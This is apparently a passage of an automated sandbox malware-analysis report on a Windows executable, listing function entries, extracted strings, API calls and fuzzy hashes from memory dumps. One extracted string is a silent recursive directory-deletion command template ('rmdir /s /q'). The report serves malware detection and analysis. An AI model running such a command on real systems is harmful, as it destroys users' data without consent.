                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                          • String ID: integral cannot be stored in wchar_t
                          • API String ID: 4097890229-1689078516
                          • Opcode ID: 54bb480375be3ebf0a72b67a97a54435c89e9a34a2873debed63dd63b569f6ae
                          • Instruction ID: 08104ec7ba9abf710d050cb3787b688125a1394cdd9a94a46d376186aed80fd0
                          • Opcode Fuzzy Hash: 54bb480375be3ebf0a72b67a97a54435c89e9a34a2873debed63dd63b569f6ae
                          • Instruction Fuzzy Hash: 1AE1C272E1CB8189EB10ABA8D4403BDB7E0FB44758F904235EA9D97B99EF79D485C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                          • String ID: integral cannot be stored in wchar_t
                          • API String ID: 4097890229-1689078516
                          • Opcode ID: bd45317c97a8290d973bb3e51f545f26f5acee043a9526c901b580a979913f6b
                          • Instruction ID: bcdeb99e9fb4ef2aeba85dcc6ac18976f5caf3b6a629774595d50d1f92ff916c
                          • Opcode Fuzzy Hash: bd45317c97a8290d973bb3e51f545f26f5acee043a9526c901b580a979913f6b
                          • Instruction Fuzzy Hash: 0AE1D622A1C7A1C9EB10EBA8D4443FCB7E0FB45758F504236EA9D87A99DF79D485C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                          • API String ID: 3215553584-1196891531
                          • Opcode ID: 66b2f51a0649884e4096f9c7989d83c361a7af35ddc5b3c377426008520acf5f
                          • Instruction ID: ade4673b68db568eba1dda5ef60044fe974bd23a443b4066f42250f63c0a23e9
                          • Opcode Fuzzy Hash: 66b2f51a0649884e4096f9c7989d83c361a7af35ddc5b3c377426008520acf5f
                          • Instruction Fuzzy Hash: BB819DB2E4C64289F765BF268118278B6E0BB15F88FD5A031DB0DD7685CE2FE8029601
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 5a37976d64d3f605dbfc814b555d63d9fccece6550d88a2dbb9a871407429eb6
                          • Instruction ID: 297f70af227c22a9bd6c3ff46f2117e96541125597b708b2192a544b1c0a5e76
                          • Opcode Fuzzy Hash: 5a37976d64d3f605dbfc814b555d63d9fccece6550d88a2dbb9a871407429eb6
                          • Instruction Fuzzy Hash: 9091A073A0C7818AE750EFA5E4802ADBBE0FB44788F14412AEB8D97B55DF39D195CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: false$true
                          • API String ID: 3668304517-2658103896
                          • Opcode ID: 9accd12e456d6621ec8394857af616d07afa0e2d4d747a09af928d0b79962d70
                          • Instruction ID: 918f95c7e7d008d8d5ff63f93432955a2e056e156a29b8dfbf4e93fa9a2a42c4
                          • Opcode Fuzzy Hash: 9accd12e456d6621ec8394857af616d07afa0e2d4d747a09af928d0b79962d70
                          • Instruction Fuzzy Hash: 9361A062B0DB8599FB00FBA9D0402ECA3F1BB447A8F504632DE5D677A9EE3AD555C300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: 7b9ffd96eb02bcab443bbab1ea342f17490cf91d6da523a2e753e094f5bd8c31
                          • Instruction ID: 232df735a980c805da3c94f4e10db3b624524abdd11d57e325f3ef02d4fe6359
                          • Opcode Fuzzy Hash: 7b9ffd96eb02bcab443bbab1ea342f17490cf91d6da523a2e753e094f5bd8c31
                          • Instruction Fuzzy Hash: 34519F72A1D6028ADB54FB56E454A78B3E1FB44F98F114538DA4E87788EF7EE841C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 232758f28d48bca0751b0218d3e2d5f792810a88b8735803dbe5591d708a7737
                          • Instruction ID: 372b7fcfe0a8f376c1a48a3abd1f5af459552b934459c4a95d140d61b7bf5b56
                          • Opcode Fuzzy Hash: 232758f28d48bca0751b0218d3e2d5f792810a88b8735803dbe5591d708a7737
                          • Instruction Fuzzy Hash: 1B619E7290CB8586DB20AF55E4413AAB7E0FB85B84F044235EB9D93B99CF7DE195CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: a2a4ce20d499f562107bbf072005eea22e7a711c73ad7228162584aea294dff5
                          • Instruction ID: 704eebc0529e1a78feee2a6bdaef3fbb06190aab12bc9b4a7c0f4289706753f1
                          • Opcode Fuzzy Hash: a2a4ce20d499f562107bbf072005eea22e7a711c73ad7228162584aea294dff5
                          • Instruction Fuzzy Hash: 6E51803290C3828AEB74BFA19144268B7E0FB55B95F144135DA9D87BDACF3EE950CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                          • String ID: bad locale name
                          • API String ID: 2775327233-1405518554
                          • Opcode ID: 10c9d6a64b0761eb994ff3f0882ec146ef825495342156a331405f159a6c9d2b
                          • Instruction ID: cb181ebc9ab63e3227f230838c7ad159b8907880f2080f650317885b5cc38089
                          • Opcode Fuzzy Hash: 10c9d6a64b0761eb994ff3f0882ec146ef825495342156a331405f159a6c9d2b
                          • Instruction Fuzzy Hash: 57414822B0EA418AEB14FFB1D4902FC62E4BF44B48F044535EA4DA7A9ADE3AD525D344
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 04c98705ab737532548b3a5d29c5fb6375a071cc17f856b1ee6e5a726e556bd2
                          • Instruction ID: a055169d4319c4b8219dd93f0b705d4ca23249aeeed96b57ca87465b67f9e7d5
                          • Opcode Fuzzy Hash: 04c98705ab737532548b3a5d29c5fb6375a071cc17f856b1ee6e5a726e556bd2
                          • Instruction Fuzzy Hash: 81D10132B0CA8189EB10EFB5D4402AC77B6FB05B98B845236DF4DA7B89DE39D146C740
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF646E68327,?), ref: 00007FF646E6845A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 20ec9291bd5197c22fe20bfa2a151bfb9fdaba5cef85e4c25a9d644427f9bc83
                          • Instruction ID: 3cd9749a319e2ab73e7323c07e5d6027ac5a51e2eb8e31841b5d9651ad59497d
                          • Opcode Fuzzy Hash: 20ec9291bd5197c22fe20bfa2a151bfb9fdaba5cef85e4c25a9d644427f9bc83
                          • Instruction Fuzzy Hash: 1791D532A2C65285FB50FF6594542BEABE0BB44B88F842136DF0F97685DE3AE446C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 203985260-0
                          • Opcode ID: 25339e7a552c1f5e1cf2dbfc7988e23db3c9975486644391a109ba6f3d96e73b
                          • Instruction ID: 7f3a42dfab52351002c071759e85ae23c4277421102e85720e2733f3a64d92e3
                          • Opcode Fuzzy Hash: 25339e7a552c1f5e1cf2dbfc7988e23db3c9975486644391a109ba6f3d96e73b
                          • Instruction Fuzzy Hash: 4C211876A1CB9586E320AF11A44432EB7B4FB89B94F244539DB8D93B55DF39D8068B00
                          APIs
                          • GetFileInformationByHandleEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF646E58E12,?,?,?,00007FF646E455A6), ref: 00007FF646E58728
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF646E58E12,?,?,?,00007FF646E455A6), ref: 00007FF646E58736
                          • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF646E58E12,?,?,?,00007FF646E455A6), ref: 00007FF646E5874E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: FileHandleInformation$ErrorLast
                          • String ID:
                          • API String ID: 3070998852-0
                          • Opcode ID: 6990d8e371be0eb46f30ceadd86b13aea8d53be9ad5218298b234a77ccbc6518
                          • Instruction ID: 4324b4fb80819e2eb99109b62a6140056f532ed9107a22793f2e07cd3f13f68e
                          • Opcode Fuzzy Hash: 6990d8e371be0eb46f30ceadd86b13aea8d53be9ad5218298b234a77ccbc6518
                          • Instruction Fuzzy Hash: 1401213170CA4185EB60BB61E84016AB3E1BF48BC4F548835DA8DC7799DE3DD455C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ErrorFileHandleInformationLast
                          • String ID:
                          • API String ID: 275135790-0
                          • Opcode ID: 189db887cbd54416728a2c52c8d663a7f58f90dcc3549c8f39d5c895ca1655f4
                          • Instruction ID: efc47bbbb4a8bbf0afc92e0e1b8be576cc838d51479a6b842c49fc815dec2acf
                          • Opcode Fuzzy Hash: 189db887cbd54416728a2c52c8d663a7f58f90dcc3549c8f39d5c895ca1655f4
                          • Instruction Fuzzy Hash: C4F0A431A0C15286FB687BA1E8546B6A7E0FF54705F440939C60EC25A5EF2EE9898742
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CreateErrorLastLinkSymbolic
                          • String ID:
                          • API String ID: 191780330-0
                          • Opcode ID: 9dc62a7cf823184e85012eaed8589f325e11e2e6911a0eff8293541a438384c3
                          • Instruction ID: 27bad891780e7da37d8bc3de926a68c229b52f6dfdbc7ea72b48d150511029c4
                          • Opcode Fuzzy Hash: 9dc62a7cf823184e85012eaed8589f325e11e2e6911a0eff8293541a438384c3
                          • Instruction Fuzzy Hash: 54F03A10B2C6A2C2EFA07B52B44402BA3A0BF55BC5B045530D94D83A16CF6ED4868700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: __except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 1467352782-3733052814
                          • Opcode ID: 0f82fb2d3ad31d1d66fdef862e6fc3d28219c5a25c697c5c52fec34cb4bfdd94
                          • Instruction ID: 0ce777a2bf4f269a82a740b75d2689da0f0b9ead8e5f8043d75c22f78927a978
                          • Opcode Fuzzy Hash: 0f82fb2d3ad31d1d66fdef862e6fc3d28219c5a25c697c5c52fec34cb4bfdd94
                          • Instruction Fuzzy Hash: DD71BE7291C68186EB60BFA194447BDBBE1FB40B89F089135DE4C87A89CF2ED591CB41
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: rmdir /s /q "{}Windows \"
                          • API String ID: 3668304517-3837830258
                          • Opcode ID: a759d48ec16a8946202d260abdf6d8aed099bd78d688fbf9fb871c07463b6b49
                          • Instruction ID: a8f64c2cc37b6b42e60fde13c2cf1a6868281f213fcda1ef4900a10b4478837a
                          • Opcode Fuzzy Hash: a759d48ec16a8946202d260abdf6d8aed099bd78d688fbf9fb871c07463b6b49
                          • Instruction Fuzzy Hash: 3C517D72B0DB8199EB00AF78D4803EC63E1FB54798F406636EA5D93A99EF79D194C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CreateFrameInfo__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2558813199-1018135373
                          • Opcode ID: ad2ba110bbec0c490ddea6de1ab49c95b7244d5675ece0e49c85581df8a2d1ef
                          • Instruction ID: 9e53d82f4d886b38e530147312dacc77ab05c3a97aecf9c2d97223d9349bb5ad
                          • Opcode Fuzzy Hash: ad2ba110bbec0c490ddea6de1ab49c95b7244d5675ece0e49c85581df8a2d1ef
                          • Instruction Fuzzy Hash: 4B512B7661C74186EA20FB66E54026DBBE4FB88B90F101139EB8D87B66CF3DE451CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: FileModuleName_invalid_parameter_noinfo
                          • String ID: C:\Users\user\Desktop\Ld0f3NDosJ.exe
                          • API String ID: 3307058713-2886519679
                          • Opcode ID: dc08b98884e5cc01c5dfc0b6debda3346ccd11862c75ac40e9c1eaeda5616f18
                          • Instruction ID: d810d6d99a5edc8f95b9db752d203c9042ce33e50ad038f76d82a37624b38030
                          • Opcode Fuzzy Hash: dc08b98884e5cc01c5dfc0b6debda3346ccd11862c75ac40e9c1eaeda5616f18
                          • Instruction Fuzzy Hash: 44414E36A0CB1285E714FF25D4400BDA7E4FF847D4B956035EA4E87B95DE3AE4828750
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 25aa8f2d82525bf823d4221f4dd8133c36d17dee247ba30e8a756d0ec50b3ddd
                          • Instruction ID: c28224fc0e200d31ab1b33d8899f0a618f4ffda885c31f2edf8474580553f9d5
                          • Opcode Fuzzy Hash: 25aa8f2d82525bf823d4221f4dd8133c36d17dee247ba30e8a756d0ec50b3ddd
                          • Instruction Fuzzy Hash: DD41E362A1DA8186EB50BF25E4047AAB7E0FB88784F841131EB4DC7758EF7DD445C710
                          APIs
                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF646E4118F), ref: 00007FF646E5CA30
                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF646E4118F), ref: 00007FF646E5CA71
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
